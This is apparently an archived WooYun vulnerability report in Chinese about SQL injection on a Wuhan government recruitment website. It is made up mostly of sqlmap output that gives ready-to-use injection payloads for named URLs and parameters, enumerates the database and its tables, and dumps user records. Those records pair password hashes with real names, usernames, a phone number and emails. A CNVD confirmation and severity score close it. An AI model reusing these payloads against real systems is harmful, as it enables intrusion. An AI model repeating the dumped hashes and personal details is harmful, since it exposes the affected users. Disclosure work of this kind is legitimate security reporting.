乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-05-17: 细节已通知厂商并且等待厂商处理中 2013-05-20: 厂商已经确认,细节仅向厂商公开 2013-05-30: 细节向核心白帽子及相关领域专家公开 2013-06-09: 细节向普通白帽子公开 2013-06-19: 细节向实习白帽子公开 2013-07-01: 细节向公众公开
http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1Place: GETParameter: t Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: t=1' AND 9314=9314 AND 'arrX'='arrX Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: t=1'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: t=1' WAITFOR DELAY '0:0:5'-----
http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=43' AND 8962=8962 AND 'dCxJ'='dCxJ Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: id=-3937' UNION ALL SELECT 73, CHAR(58)+CHAR(98)+CHAR(121)+CHAR(108)+CHAR(58)+CHAR(72)+CHAR(122)+CHAR(113)+CHAR(116)+CHAR(120)+CHAR(70)+CHAR(102)+CHAR(100)+CHAR(108)+CHAR(87)+CHAR(58)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(58), 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=43'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=43' WAITFOR DELAY '0:0:5'-----
[02:02:08] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
available databases [5]: [*] EUF[*] master[*] model[*] msdb[*] tempdb
关键数据库中的表
Database: EUF[26 tables]+------------------------------+| dbo.EUF_SYS_ButtonPermission || dbo.EUF_SYS_Buttons || dbo.EUF_SYS_Dictionary || dbo.EUF_SYS_DictionaryType || dbo.EUF_SYS_Menu || dbo.EUF_SYS_Role || dbo.EUF_SYS_RolePermission || dbo.EUF_SYS_User || dbo.EUF_SYS_UserRole || dbo.PRE_Cate || dbo.PRE_DocVisitLog || dbo.PRE_QueryLog || dbo.aut_Job || dbo.aut_Question || dbo.aut_Resume || dbo.aut_p || dbo.aut_s || dbo.doc_files || dbo.doc_table1 || dbo.doc_table2 || dbo.doc_table3 || dbo.doc_table4 || dbo.doc_table5 || dbo.doc_table6 || dbo.doc_table7 || dbo.index_task |+------------------------------+
Database: EUFTable: dbo.EUF_SYS_User[8 columns]+------------+----------+| Column | Type |+------------+----------+| F_LoginUrl | varchar || F_PassWord | varchar || F_RealName | varchar || F_RegDate | datetime || F_RoleID | varchar || F_State | varchar || F_UserID | int || F_UserName | varchar |+------------+----------+
获取表中的信息:
[00:34:51] [INFO] fetching entries of column(s) 'F_PassWord, F_UserName' for table 'EUF_SYS_User' in database 'EUF'[00:34:51] [INFO] fetching number of column(s) 'F_PassWord, F_UserName' entries for table 'EUF_SYS_User' in database 'EUF'[00:34:51] [INFO] retrieved: 2247[00:35:13] [INFO] fetching number of distinct values for column 'F_PassWord'[00:35:13] [INFO] retrieved: 1579[00:35:41] [INFO] fetching number of distinct values for column 'F_UserName'[00:35:41] [INFO] retrieved: 2232[00:36:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows[00:36:01] [INFO] retrieved: 0038B8ACA49559591C0E0A7DECDA2109[00:39:50] [INFO] retrieved: 白重阳[00:42:00] [INFO] retrieved: 0082FB3BDE4D0352EA216A4557625265[00:46:36] [INFO] retrieved: 雷能[00:48:08] [INFO] retrieved: 0094AD3326E94F398A0CE2E5469ED1D1[00:52:25] [INFO] retrieved: 15871409546[00:54:00] [INFO] retrieved: 00CA1622835B03A23F920FFC187A0603[00:58:09] [INFO] retrieved: [email protected][01:01:06] [INFO] retrieved: 00D149ED03C84DE7803DCFDED3AF7CDD[01:05:29] [INFO] retrieved: kangta8358[01:06:59] [INFO] retrieved: 00E56BC84DAE888D58CDC0DFBD4B91C0[01:11:24] [INFO] retrieved: rush1985[01:12:29] [INFO] retrieved: 01533FF41E5D4226096DD191D5BDA6D4[01:16:36] [INFO] retrieved: EasyKevin[01:17:49] [INFO] retrieved: 0199B38A911715A857232DB2D4D4EC59[01:22:13] [INFO] retrieved: 张鑫[01:23:51] [INFO] retrieved: 01B90361881AD76688E1D3F06408C33E[01:28:31] [INFO] retrieved: [email protected][01:30:45] [INFO] retrieved: 020EB9F88D9DAF9128B208D894381BCD[01:34:48] [INFO] retrieved: 吴腾标[01:36:55] [INFO] retrieved: 021E98A5E9F8843F2C7D8E3547F9D1DC[01:41:36] [INFO] retrieved: susan870106[01:43:05] [INFO] retrieved: 023299564B0DB47D5F3E476A254D0C21[01:47:57] [INFO] retrieved: xy1992[01:49:10] [INFO] retrieved: 0280DEFE4139A5F6B654612093FDA20A[01:53:48] [INFO] retrieved: weihulove[01:55:34] [INFO] retrieved: 029F927284212196F3A59CEFFD7A204C[01:59:53] [INFO] retrieved: yanfang429[02:01:07] [INFO] retrieved: 02AA01E3ABECF5529448ADA16A873462[02:05:19] [INFO] retrieved: xiexianwen 。。。。。。
危害等级:高
漏洞Rank:11
确认时间:2013-05-20 23:05
CNVD确认并复现所述情况,已在20日下午转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。按完全影响机密性进行评分(涉及多条用户数据),rank=7.79*1.0*1.4=10.906
暂无